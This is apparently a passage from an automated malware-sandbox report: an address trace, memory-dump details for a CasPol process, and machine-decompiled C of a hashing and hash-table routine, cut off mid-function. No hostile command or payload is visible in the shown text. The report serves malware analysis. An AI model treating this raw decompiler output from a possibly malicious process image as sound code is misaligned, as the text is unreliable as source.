                                                                        0x013d6e70
                                                                        0x013d6e73
                                                                        0x013d6e76
                                                                        0x013d6e79
                                                                        0x013d6e7c
                                                                        0x013d6e7f
                                                                        0x013d6e84
                                                                        0x013d710f
                                                                        0x013d710f
                                                                        0x013d6e8c
                                                                        0x013d6e8e
                                                                        0x013d6e8e
                                                                        0x013d6e97
                                                                        0x0141f5d3
                                                                        0x0141f5d3
                                                                        0x013d6e9d
                                                                        0x013d6ea3
                                                                        0x013d6eaa
                                                                        0x013d6ead
                                                                        0x013d6eb2
                                                                        0x013d6eb4
                                                                        0x013d6eb7
                                                                        0x013d7466
                                                                        0x013d7466
                                                                        0x00000000
                                                                        0x013d6ebd
                                                                        0x013d6ebd
                                                                        0x013d6ec4
                                                                        0x013d6eca
                                                                        0x013d6ecc
                                                                        0x013d6ecf
                                                                        0x013d6ed2
                                                                        0x013d6ede
                                                                        0x0141f5df
                                                                        0x0141f5e0
                                                                        0x00000000
                                                                        0x0141f5e0
                                                                        0x013d6ee6
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013d6eec
                                                                        0x013d6ef3
                                                                        0x013d7181
                                                                        0x013d6f02
                                                                        0x013d6f02
                                                                        0x013d6f02
                                                                        0x013d6f0b
                                                                        0x013d6f0d
                                                                        0x013d6f10
                                                                        0x013d6f17
                                                                        0x013d6f21
                                                                        0x013d6f24
                                                                        0x013d6f2d
                                                                        0x013d6f31
                                                                        0x013d6f36
                                                                        0x013d6f3d
                                                                        0x013d7413
                                                                        0x013d7416
                                                                        0x013d7419
                                                                        0x013d741c
                                                                        0x013d7421
                                                                        0x013d742b
                                                                        0x013d742b
                                                                        0x013d742e
                                                                        0x013d7439
                                                                        0x0141f60b
                                                                        0x0141f60b
                                                                        0x0141f615
                                                                        0x0141f619
                                                                        0x013d743f
                                                                        0x013d7447
                                                                        0x013d7454
                                                                        0x013d745a
                                                                        0x013d745f
                                                                        0x013d745f
                                                                        0x00000000
                                                                        0x013d7439
                                                                        0x013d7425
                                                                        0x0141f5e9
                                                                        0x0141f5ed
                                                                        0x0141f5f4
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0141f5fd
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0141f603
                                                                        0x0141f603
                                                                        0x00000000
                                                                        0x013d6f43
                                                                        0x013d6f43
                                                                        0x013d6f45
                                                                        0x013d6f48
                                                                        0x013d6f4e
                                                                        0x013d6f65
                                                                        0x013d6f68
                                                                        0x013d721f
                                                                        0x013d6f83
                                                                        0x013d6f86
                                                                        0x013d72dc
                                                                        0x013d72dc
                                                                        0x013d6f9e
                                                                        0x013d6fa1
                                                                        0x013d6fa3
                                                                        0x013d6fa5
                                                                        0x013d6fa8
                                                                        0x013d6fab
                                                                        0x013d6fae
                                                                        0x013d6fb1
                                                                        0x013d6fb4
                                                                        0x013d6fb6
                                                                        0x013d6fb9
                                                                        0x013d6fbf
                                                                        0x013d718a
                                                                        0x013d718e
                                                                        0x0141f831
                                                                        0x0141f831
                                                                        0x0141f833
                                                                        0x0141f836
                                                                        0x00000000
                                                                        0x0141f836
                                                                        0x013d7194
                                                                        0x00000000
                                                                        0x0141f658
                                                                        0x0141f658
                                                                        0x0141f65a
                                                                        0x0141f65d
                                                                        0x0141f662
                                                                        0x0141f662
                                                                        0x0141f665
                                                                        0x0141f667
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0141f669
                                                                        0x0141f66c
                                                                        0x0141f670
                                                                        0x0141f673
                                                                        0x0141f67a
                                                                        0x0141f67a
                                                                        0x0141f67b
                                                                        0x0141f67e
                                                                        0x0141f681
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0141f683
                                                                        0x0141f683
                                                                        0x00000000
                                                                        0x0141f683
                                                                        0x0141f675
                                                                        0x0141f678
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0141f678
                                                                        0x0141f686
                                                                        0x0141f688
                                                                        0x0141f68b
                                                                        0x0141f68e
                                                                        0x0141f691
                                                                        0x0141f694
                                                                        0x0141f698
                                                                        0x0141f69c
                                                                        0x0141f6a0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013d7397
                                                                        0x013d739c
                                                                        0x013d739f
                                                                        0x013d73a3
                                                                        0x013d73a5
                                                                        0x0141f6bb
                                                                        0x0141f6c1
                                                                        0x0141f6c4
                                                                        0x013d73ab
                                                                        0x013d73ab
                                                                        0x013d73ab
                                                                        0x013d73b1
                                                                        0x013d73b5
                                                                        0x013d73ba
                                                                        0x013d73c0
                                                                        0x013d73c3
                                                                        0x013d73c7
                                                                        0x013d73cc
                                                                        0x013d73d0
                                                                        0x013d73d3
                                                                        0x0141f6cc
                                                                        0x0141f6d4
                                                                        0x0141f6d9
                                                                        0x0141f6dd
                                                                        0x0141f6e1
                                                                        0x0141f6e5
                                                                        0x0141f6f0
                                                                        0x0141f6fc
                                                                        0x0141f700
                                                                        0x0141f709
                                                                        0x0141f70e
                                                                        0x0141f710
                                                                        0x0141f784
                                                                        0x0141f788
                                                                        0x0141f78b
                                                                        0x0141f78e
                                                                        0x0141f790
                                                                        0x0141f792
                                                                        0x0141f795
                                                                        0x0141f798
                                                                        0x0141f7b7
                                                                        0x0141f7b7
                                                                        0x0141f7ba
                                                                        0x0141f7ba
                                                                        0x00000000
                                                                        0x0141f7ba
                                                                        0x0141f79a
                                                                        0x0141f79d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0141f79f
                                                                        0x0141f7a4
                                                                        0x0141f7a7
                                                                        0x0141f7ab
                                                                        0x0141f7ae
                                                                        0x0141f7b1
                                                                        0x00000000
                                                                        0x0141f7b1
                                                                        0x0141f712
                                                                        0x0141f717
                                                                        0x0141f74c
                                                                        0x0141f74e
                                                                        0x0141f752
                                                                        0x0141f756
                                                                        0x0141f75d
                                                                        0x0141f761
                                                                        0x0141f764
                                                                        0x0141f76c
                                                                        0x0141f771
                                                                        0x0141f775
                                                                        0x0141f778
                                                                        0x0141f77c
                                                                        0x00000000
                                                                        0x0141f77c
                                                                        0x0141f719
                                                                        0x0141f71d
                                                                        0x0141f720
                                                                        0x0141f723
                                                                        0x0141f726
                                                                        0x0141f729
                                                                        0x0141f72e
                                                                        0x0141f740
                                                                        0x0141f744
                                                                        0x00000000
                                                                        0x0141f744
                                                                        0x0141f730
                                                                        0x0141f732
                                                                        0x0141f735
                                                                        0x0141f738
                                                                        0x00000000
                                                                        0x013d73d9
                                                                        0x013d73d9
                                                                        0x013d73db
                                                                        0x013d73de
                                                                        0x013d73e1
                                                                        0x013d73e4
                                                                        0x013d73e7
                                                                        0x013d73ea
                                                                        0x013d73ef
                                                                        0x013d73f2
                                                                        0x013d73f6
                                                                        0x013d73f9
                                                                        0x013d73f9
                                                                        0x013d73fe
                                                                        0x013d7401
                                                                        0x013d7406
                                                                        0x013d7409
                                                                        0x00000000
                                                                        0x013d7409
                                                                        0x00000000
                                                                        0x0141f7c5
                                                                        0x0141f7ca
                                                                        0x0141f7cd
                                                                        0x0141f7d1
                                                                        0x0141f7d3
                                                                        0x0141f7da
                                                                        0x0141f7e0
                                                                        0x0141f7e3
                                                                        0x0141f7e3
                                                                        0x0141f7e6
                                                                        0x0141f7d5
                                                                        0x0141f7d5
                                                                        0x0141f7d5
                                                                        0x0141f7e9
                                                                        0x0141f7eb
                                                                        0x0141f7f0
                                                                        0x0141f7f3
                                                                        0x0141f7f5
                                                                        0x0141f7f8
                                                                        0x0141f7fb
                                                                        0x0141f7fe
                                                                        0x0141f801
                                                                        0x0141f80f
                                                                        0x0141f814
                                                                        0x0141f803
                                                                        0x0141f803
                                                                        0x0141f806
                                                                        0x0141f806
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013d719d
                                                                        0x013d71a2
                                                                        0x013d71a5
                                                                        0x013d71a9
                                                                        0x013d71ab
                                                                        0x0141f826
                                                                        0x0141f829
                                                                        0x013d71b1
                                                                        0x013d71b1
                                                                        0x013d71ba
                                                                        0x013d71ba
                                                                        0x013d71bf
                                                                        0x013d71c5
                                                                        0x013d71cf
                                                                        0x013d71d2
                                                                        0x013d71d8
                                                                        0x013d71dd
                                                                        0x013d71e4
                                                                        0x013d71e7
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013d7275
                                                                        0x013d727a
                                                                        0x013d727d
                                                                        0x013d727f
                                                                        0x013d7282
                                                                        0x013d7284
                                                                        0x0141f6a8
                                                                        0x0141f6aa
                                                                        0x0141f6aa
                                                                        0x013d728a
                                                                        0x013d728f
                                                                        0x013d7292
                                                                        0x013d7297
                                                                        0x013d729a
                                                                        0x013d729d
                                                                        0x013d72a0
                                                                        0x013d72a5
                                                                        0x013d72a9
                                                                        0x013d72ac
                                                                        0x013d72af
                                                                        0x013d72b2
                                                                        0x013d72b5
                                                                        0x013d72b7
                                                                        0x013d72ba
                                                                        0x013d72be
                                                                        0x013d72be
                                                                        0x013d72c2
                                                                        0x013d72c5
                                                                        0x013d72c8
                                                                        0x0141f6b2
                                                                        0x0141f6b2
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013d6fc5
                                                                        0x013d6fc5
                                                                        0x013d6fcc
                                                                        0x013d6fd8
                                                                        0x013d6fda
                                                                        0x013d6fdd
                                                                        0x013d6fe3
                                                                        0x013d7162
                                                                        0x0141f845
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0141f84e
                                                                        0x0141f8c4
                                                                        0x0141f8c8
                                                                        0x0141f8cb
                                                                        0x0141f8ce
                                                                        0x013d70e0
                                                                        0x013d70e0
                                                                        0x013d70e3
                                                                        0x013d70e3
                                                                        0x013d70ea
                                                                        0x013d70ef
                                                                        0x013d70f1
                                                                        0x013d70f4
                                                                        0x013d70fc
                                                                        0x013d70fd
                                                                        0x013d70fe
                                                                        0x013d710c
                                                                        0x013d710c
                                                                        0x0141f850
                                                                        0x0141f858
                                                                        0x0141f87a
                                                                        0x0141f88a
                                                                        0x0141f88d
                                                                        0x0141f890
                                                                        0x0141f893
                                                                        0x0141f895
                                                                        0x0141f898
                                                                        0x0141f8a4
                                                                        0x0141f8ad
                                                                        0x0141f8b0
                                                                        0x0141f8b3
                                                                        0x0141f8b3
                                                                        0x0141f8a4
                                                                        0x013d6fec
                                                                        0x013d6fec
                                                                        0x013d6fee
                                                                        0x00000000
                                                                        0x013d6ff1
                                                                        0x013d6ff8
                                                                        0x00000000
                                                                        0x013d6ffe
                                                                        0x013d7004
                                                                        0x013d7006
                                                                        0x013d7006
                                                                        0x013d7010
                                                                        0x013d7017
                                                                        0x013d701e
                                                                        0x013d7072
                                                                        0x013d7074
                                                                        0x013d707e
                                                                        0x013d7083
                                                                        0x013d7087
                                                                        0x013d7088
                                                                        0x013d706c
                                                                        0x013d706c
                                                                        0x013d706d
                                                                        0x00000000
                                                                        0x013d706d
                                                                        0x013d707c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013d707c
                                                                        0x013d7020
                                                                        0x013d7023
                                                                        0x013d71ef
                                                                        0x013d71ef
                                                                        0x013d71f2
                                                                        0x013d71f7
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013d71fd
                                                                        0x013d7200
                                                                        0x013d7205
                                                                        0x013d720b
                                                                        0x013d720e
                                                                        0x013d72eb
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013d72f6
                                                                        0x00000000
                                                                        0x013d7030
                                                                        0x013d7037
                                                                        0x013d703e
                                                                        0x013d7055
                                                                        0x013d705a
                                                                        0x013d7062
                                                                        0x0141f908
                                                                        0x0141f90e
                                                                        0x0141f90f
                                                                        0x0141f90f
                                                                        0x0141f908
                                                                        0x013d7062
                                                                        0x013d705a
                                                                        0x00000000
                                                                        0x013d7045
                                                                        0x013d7045
                                                                        0x013d7049
                                                                        0x013d704a
                                                                        0x013d704d
                                                                        0x013d704e
                                                                        0x00000000
                                                                        0x013d704e
                                                                        0x013d703e
                                                                        0x013d7068
                                                                        0x013d7069
                                                                        0x00000000
                                                                        0x013d7069
                                                                        0x013d72fc
                                                                        0x013d7301
                                                                        0x013d7304
                                                                        0x013d7314
                                                                        0x013d7314
                                                                        0x013d7319
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013d7325
                                                                        0x013d732d
                                                                        0x013d7330
                                                                        0x013d7356
                                                                        0x013d7357
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013d7332
                                                                        0x013d7332
                                                                        0x013d7337
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013d7343
                                                                        0x013d734b
                                                                        0x013d734e
                                                                        0x013d7361
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013d7367
                                                                        0x013d7367
                                                                        0x013d7368
                                                                        0x00000000
                                                                        0x013d7368
                                                                        0x013d7350
                                                                        0x013d7351
                                                                        0x013d7351
                                                                        0x00000000
                                                                        0x013d7332
                                                                        0x0141f8f9
                                                                        0x0141f8f9
                                                                        0x0141f8fa
                                                                        0x00000000
                                                                        0x0141f8fa
                                                                        0x013d7306
                                                                        0x013d730e
                                                                        0x0141f8ee
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0141f8f4
                                                                        0x00000000
                                                                        0x013d730e
                                                                        0x013d7214
                                                                        0x013d7214
                                                                        0x013d7217
                                                                        0x00000000
                                                                        0x013d7217
                                                                        0x013d702c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013d702c
                                                                        0x013d708d
                                                                        0x013d7094
                                                                        0x013d7098
                                                                        0x013d70a0
                                                                        0x013d738c
                                                                        0x013d738d
                                                                        0x013d738d
                                                                        0x013d70a0
                                                                        0x013d7098
                                                                        0x013d70a6
                                                                        0x013d70ab
                                                                        0x013d70b3
                                                                        0x013d70b5
                                                                        0x013d70cd
                                                                        0x013d70cd
                                                                        0x013d70d0
                                                                        0x013d70d8
                                                                        0x013d711a
                                                                        0x013d711c
                                                                        0x013d711c
                                                                        0x013d7121
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013d7129
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013d712b
                                                                        0x013d712b
                                                                        0x013d7130
                                                                        0x013d737e
                                                                        0x013d7381
                                                                        0x00000000
                                                                        0x013d7381
                                                                        0x013d7138
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013d7144
                                                                        0x013d7144
                                                                        0x013d70da
                                                                        0x013d70da
                                                                        0x013d70dd
                                                                        0x00000000
                                                                        0x013d70dd
                                                                        0x013d70b7
                                                                        0x013d70b8
                                                                        0x013d70bb
                                                                        0x013d70c2
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013d70c7
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013d70c9
                                                                        0x013d70ca
                                                                        0x00000000
                                                                        0x013d70ad
                                                                        0x013d70ad
                                                                        0x013d70af
                                                                        0x00000000
                                                                        0x013d70af
                                                                        0x013d7148
                                                                        0x013d714d
                                                                        0x0141f8e2
                                                                        0x0141f8e2
                                                                        0x013d7153
                                                                        0x013d7154
                                                                        0x013d7157
                                                                        0x00000000
                                                                        0x013d7157
                                                                        0x0141f87c
                                                                        0x0141f87f
                                                                        0x0141f882
                                                                        0x00000000
                                                                        0x0141f882
                                                                        0x0141f85e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0141f864
                                                                        0x0141f869
                                                                        0x0141f86c
                                                                        0x00000000
                                                                        0x0141f86c
                                                                        0x013d7168
                                                                        0x013d7170
                                                                        0x0141f8d6
                                                                        0x0141f8d6
                                                                        0x013d7176
                                                                        0x013d7179
                                                                        0x00000000
                                                                        0x013d7179
                                                                        0x013d6fe9
                                                                        0x013d6fe9
                                                                        0x00000000
                                                                        0x013d6fe9
                                                                        0x013d6fbf
                                                                        0x013d6f8c
                                                                        0x013d6f93
                                                                        0x013d72d6
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013d72d6
                                                                        0x013d6f99
                                                                        0x013d6f99
                                                                        0x013d6f99
                                                                        0x00000000
                                                                        0x013d6f68
                                                                        0x013d6f50
                                                                        0x013d6f56
                                                                        0x013d722c
                                                                        0x0141f629
                                                                        0x0141f629
                                                                        0x00000000
                                                                        0x0141f629
                                                                        0x013d7232
                                                                        0x013d7239
                                                                        0x0141f623
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0141f623
                                                                        0x013d723f
                                                                        0x013d7242
                                                                        0x0141f64e
                                                                        0x0141f64e
                                                                        0x00000000
                                                                        0x0141f64e
                                                                        0x013d7248
                                                                        0x013d724f
                                                                        0x013d7373
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013d7379
                                                                        0x013d7255
                                                                        0x013d7258
                                                                        0x0141f63c
                                                                        0x0141f648
                                                                        0x00000000
                                                                        0x0141f648
                                                                        0x013d725e
                                                                        0x013d7265
                                                                        0x0141f636
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0141f636
                                                                        0x013d726b
                                                                        0x013d726b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013d6f56
                                                                        0x013d6f3d
                                                                        0x013d6ed2
                                                                        0x00000000
                                                                        0x013d6ec4

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1294defdcc7a7c508388051f62451ba58cedcf92c321282271f641694209dede
                                                                        • Instruction ID: 0d305633306781d90f1d0a552cca5e9b77102670d7692f860341ab8e6b52b2cd
                                                                        • Opcode Fuzzy Hash: 1294defdcc7a7c508388051f62451ba58cedcf92c321282271f641694209dede
                                                                        • Instruction Fuzzy Hash: 9D02B276D10219CBCB28CF9CE4816BDBBB5FF0470CF55412EE915AB695E770988ACB80
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0148DFCE Relevance: .5, Instructions: 458COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 68%
                                                                        			E0148DFCE(intOrPtr __ecx, signed int __edx, signed int _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed char _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				signed int _v52;
				signed int _v56;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t173;
				signed int _t175;
				unsigned int _t177;
				intOrPtr _t178;
				signed int _t201;
				unsigned int _t223;
				unsigned int _t240;
				signed int _t258;
				intOrPtr _t269;
				signed int _t270;
				signed char _t271;
				signed char _t273;
				signed int _t274;
				intOrPtr* _t281;
				signed int* _t284;
				signed char _t292;
				signed int _t293;
				signed char _t300;
				signed char _t305;
				intOrPtr _t314;
				signed int _t315;
				signed int _t319;
				signed int _t323;
				intOrPtr _t326;
				signed char _t328;
				signed int _t334;
				signed char _t335;
				void* _t365;
				signed int _t368;
				signed int* _t373;
				signed int _t377;
				signed int _t378;
				signed int _t381;
				signed int _t382;
				signed int _t383;
				unsigned int _t384;
				void* _t385;
				void* _t386;
				void* _t387;
				void* _t388;
				void* _t389;
				void* _t390;
				signed int _t393;
				signed int _t406;
				signed int _t407;

				_t367 = __edx;
				_v8 =  *0x14ad360 ^ _t407;
				_t269 = __ecx;
				_v44 = __ecx;
				if(__ecx == 0) {
					L80:
					_t270 = 0;
					L81:
					return E013FB640(_t270, _t270, _v8 ^ _t407, _t367, _t383, _t392);
				}
				_t383 = _a4;
				if(_t383 == 0 || __edx == 0) {
					goto L80;
				} else {
					_v56 = _t383;
					_t393 = 0x4cb2f;
					_t384 = _t383 << 2;
					_v52 = __edx;
					if(_t384 < 8) {
						L7:
						_t385 = _t384 - 1;
						if(_t385 == 0) {
							L20:
							_t392 = _t393 * 0x25 + ( *_t367 & 0x000000ff);
							L21:
							_t15 = _t269 + 0x18; // 0x14a8680
							_v48 = _t15;
							L013DFAD0(_t15);
							_t17 = _t269 + 0xc; // 0x14a8674
							_t367 = _t17;
							_t383 = 0;
							_v20 = _t367;
							_t271 = 0;
							while(1) {
								L22:
								_t19 = _t367 + 4; // 0x0
								_t173 =  *_t19;
								_v12 = _v12 | 0xffffffff;
								_v12 = _v12 << (_t173 & 0x0000001f);
								_t300 = _t392 & _v12;
								_v16 = _t300;
								_v16 = _v16 >> 0x18;
								_v28 = _t300;
								_v28 = _v28 >> 0x10;
								_v24 = _t300;
								_v24 = _v24 >> 8;
								_v32 = _t300;
								if(_t271 != 0) {
									goto L25;
								}
								_t240 = _t173 >> 5;
								_v36 = _t240;
								if(_t240 == 0) {
									_t270 = _t383;
									L34:
									if(_t270 == 0) {
										L38:
										_t272 = _v48;
										E013DFA00(_v48, _t300, _t383, _v48);
										_t367 =  &_v56;
										_t175 = E0148E62A(_v44,  &_v56, _t392);
										_v36 = _t175;
										if(_t175 != 0) {
											E013D2280(_t175, _t272);
											_t273 = _t383;
											do {
												_t368 = _v20;
												_v12 = _v12 | 0xffffffff;
												_t177 =  *(_t368 + 4);
												_v12 = _v12 << (_t177 & 0x0000001f);
												_t305 = _v12 & _t392;
												_v24 = _t305;
												_v24 = _v24 >> 0x18;
												_v28 = _t305;
												_v28 = _v28 >> 0x10;
												_v16 = _t305;
												_v16 = _v16 >> 8;
												_v40 = _t305;
												if(_t273 != 0) {
													while(1) {
														L44:
														_t273 =  *_t273;
														if((_t273 & 0x00000001) != 0) {
															break;
														}
														if(_t305 == ( *(_t273 + 4) & _v12)) {
															L48:
															if(_t273 == 0) {
																L55:
																_t178 = _v44;
																_t274 =  *(_t368 + 4);
																_v16 =  *((intOrPtr*)(_t178 + 0x28));
																_v32 =  *(_t178 + 0x20);
																_t181 = _t274 >> 5;
																_v24 =  *((intOrPtr*)(_t178 + 0x24));
																if( *_t368 < (_t274 >> 5) + (_t274 >> 5)) {
																	L76:
																	_t383 = _v36;
																	_t153 = (_t274 >> 5) - 1; // 0xffffffdf
																	_t367 = _t153 & (((_t274 & 0x0000001f | 0xffffffff) << (_t274 & 0x0000001f) &  *(_t383 + 4)) >> 0x00000018) + ((((_t274 & 0x0000001f | 0xffffffff) << (_t274 & 0x0000001f) &  *(_t383 + 4)) >> 0x00000010 & 0x000000ff) + ((((_t274 & 0x0000001f | 0xffffffff) << (_t274 & 0x0000001f) &  *(_t383 + 4)) >> 0x00000008 & 0x000000ff) + (((_t274 & 0x0000001f | 0xffffffff) << (_t274 & 0x0000001f) &  *(_t383 + 4) & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
																	_t281 = _v20;
																	_t314 =  *((intOrPtr*)(_t281 + 8));
																	 *_t383 =  *(_t314 + _t367 * 4);
																	 *(_t314 + _t367 * 4) = _t383;
																	 *_t281 =  *_t281 + 1;
																	E013CFFB0(_t281, _t383, _v48);
																	goto L39;
																}
																_t315 = 2;
																if(E013EF3D5( &_v40, _t181 * _t315, _t181 * _t315 >> 0x20) < 0) {
																	goto L76;
																}
																_t392 = _v40;
																if(_t392 < 4) {
																	_t392 = 4;
																}
																 *0x14ab1e0(_t392 << 2, _v16);
																_t373 =  *_v32();
																_v12 = _t373;
																if(_t373 == 0) {
																	_t274 =  *(_v20 + 4);
																	if(_t274 >= 0x20) {
																		goto L76;
																	}
																	L78:
																	_t270 = _t383;
																	L79:
																	E013CFFB0(_t270, _t383, _v48);
																	_t367 = _v36;
																	E0148E5B6(_v44, _v36);
																	goto L81;
																} else {
																	_t107 = _t392 - 1; // 0x3
																	_t319 = _t107;
																	if((_t392 & _t319) == 0) {
																		L64:
																		if(_t392 > 0x4000000) {
																			_t392 = 0x4000000;
																		}
																		_t284 = _t373;
																		_t201 = _v20 | 0x00000001;
																		asm("sbb ecx, ecx");
																		_t323 =  !(_v12 + (_t392 << 2)) & _t392 << 0x00000002 >> 0x00000002;
																		if(_t323 <= 0) {
																			L69:
																			_t377 = _v20;
																			_v40 = (_t201 | 0xffffffff) << ( *(_t377 + 4) & 0x0000001f);
																			if(( *(_t377 + 4) & 0xffffffe0) <= 0) {
																				L74:
																				_t326 =  *((intOrPtr*)(_t377 + 8));
																				_t274 =  *(_t377 + 4) & 0x0000001f | _t392 << 0x00000005;
																				 *((intOrPtr*)(_t377 + 8)) = _v12;
																				 *(_t377 + 4) = _t274;
																				if(_t326 != 0) {
																					 *0x14ab1e0(_t326, _v16);
																					 *_v24();
																					_t274 =  *(_v20 + 4);
																				}
																				goto L76;
																			} else {
																				goto L70;
																			}
																			do {
																				L70:
																				_t378 =  *((intOrPtr*)(_t377 + 8));
																				_v28 = _t378;
																				while(1) {
																					_t328 =  *(_t378 + _t383 * 4);
																					_v32 = _t328;
																					if((_t328 & 0x00000001) != 0) {
																						goto L73;
																					}
																					 *(_t378 + _t383 * 4) =  *_t328;
																					_t381 = _v12;
																					_t132 = _t392 - 1; // -1
																					_t334 = _t132 & (( *(_t328 + 4) & _v40) >> 0x00000018) + ((( *(_t328 + 4) & _v40) >> 0x00000010 & 0x000000ff) + ((( *(_t328 + 4) & _v40) >> 0x00000008 & 0x000000ff) + (( *(_t328 + 4) & _v40 & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
																					_t292 = _v32;
																					 *_t292 =  *(_t381 + _t334 * 4);
																					 *(_t381 + _t334 * 4) = _t292;
																					_t378 = _v28;
																				}
																				L73:
																				_t377 = _v20;
																				_t383 = _t383 + 1;
																			} while (_t383 <  *(_t377 + 4) >> 5);
																			goto L74;
																		} else {
																			_t382 = _t383;
																			do {
																				_t382 = _t382 + 1;
																				 *_t284 = _t201;
																				_t284 =  &(_t284[1]);
																			} while (_t382 < _t323);
																			goto L69;
																		}
																	}
																	_t335 = _t319 | 0xffffffff;
																	if(_t392 == 0) {
																		L63:
																		_t392 = 1 << _t335;
																		goto L64;
																	} else {
																		goto L62;
																	}
																	do {
																		L62:
																		_t335 = _t335 + 1;
																		_t392 = _t392 >> 1;
																	} while (_t392 != 0);
																	goto L63;
																}
															}
															goto L49;
														}
													}
													_t273 = _t383;
													goto L48;
												}
												_t223 = _t177 >> 5;
												_v32 = _t223;
												if(_t223 == 0) {
													_t273 = _t383;
													L51:
													if(_t273 == 0) {
														goto L55;
													}
													_t88 = _t273 + 8; // 0x8
													if(E0148E7A8(_t88) != 0) {
														goto L79;
													}
													goto L78;
												}
												_t273 =  *((intOrPtr*)(_t368 + 8)) + (_v32 - 0x00000001 & (_v24 & 0x000000ff) + 0x164b2f3f + (((_t305 & 0x000000ff) * 0x00000025 + (_v16 & 0x000000ff)) * 0x00000025 + (_v28 & 0x000000ff)) * 0x00000025) * 4;
												_t305 = _v40;
												goto L44;
												L49:
											} while (E0148EE71(_t273,  &_v56) == 0);
											_t368 = _v20;
											goto L51;
										}
										L39:
										_t270 = _t383;
										goto L81;
									}
									_t50 = _t270 + 8; // 0x8
									_t345 = _t50;
									if(E0148E7A8(_t50) == 0) {
										_t270 = _t383;
									}
									E013DFA00(_t270, _t345, _t383, _v48);
									goto L81;
								}
								_t40 = _t367 + 8; // 0x0
								_t271 =  *_t40 + (_v36 - 0x00000001 & (_v16 & 0x000000ff) + 0x164b2f3f + (((_t300 & 0x000000ff) * 0x00000025 + (_v24 & 0x000000ff)) * 0x00000025 + (_v28 & 0x000000ff)) * 0x00000025) * 4;
								_t300 = _v32;
								L25:
								_t367 = _v12;
								while(1) {
									_t271 =  *_t271;
									if((_t271 & 0x00000001) != 0) {
										break;
									}
									if(_t300 == ( *(_t271 + 4) & _t367)) {
										L30:
										if(_t270 == 0) {
											goto L38;
										}
										if(E0148EE71(_t270,  &_v56) != 0) {
											goto L34;
										}
										_t367 = _v20;
										goto L22;
									}
								}
								_t270 = _t383;
								goto L30;
							}
						}
						_t386 = _t385 - 1;
						if(_t386 == 0) {
							L19:
							_t393 = _t393 * 0x25 + ( *_t367 & 0x000000ff);
							_t367 = _t367 + 1;
							goto L20;
						}
						_t387 = _t386 - 1;
						if(_t387 == 0) {
							L18:
							_t393 = _t393 * 0x25 + ( *_t367 & 0x000000ff);
							_t367 = _t367 + 1;
							goto L19;
						}
						_t388 = _t387 - 1;
						if(_t388 == 0) {
							L17:
							_t393 = _t393 * 0x25 + ( *_t367 & 0x000000ff);
							_t367 = _t367 + 1;
							goto L18;
						}
						_t389 = _t388 - 1;
						if(_t389 == 0) {
							L16:
							_t393 = _t393 * 0x25 + ( *_t367 & 0x000000ff);
							_t367 = _t367 + 1;
							goto L17;
						}
						_t390 = _t389 - 1;
						if(_t390 == 0) {
							L15:
							_t393 = _t393 * 0x25 + ( *_t367 & 0x000000ff);
							_t367 = _t367 + 1;
							goto L16;
						}
						if(_t390 != 1) {
							goto L21;
						}
						_t393 = _t393 * 0x25 + ( *_t367 & 0x000000ff);
						_t367 = _t367 + 1;
						goto L15;
					}
					_t258 = _t384 >> 3;
					_v36 = _t258;
					_t293 = _t258;
					_t384 = _t384 + _t258 * 0xfffffff8;
					do {
						_t365 = (((((( *(_t367 + 1) & 0x000000ff) * 0x25 + ( *(_t367 + 2) & 0x000000ff)) * 0x25 + ( *(_t367 + 3) & 0x000000ff)) * 0x25 + ( *(_t367 + 4) & 0x000000ff)) * 0x25 + ( *(_t367 + 5) & 0x000000ff)) * 0x25 + ( *(_t367 + 6) & 0x000000ff)) * 0x25 + ( *_t367 & 0x000000ff) * 0x1a617d0d;
						_t406 =  *(_t367 + 7) & 0x000000ff;
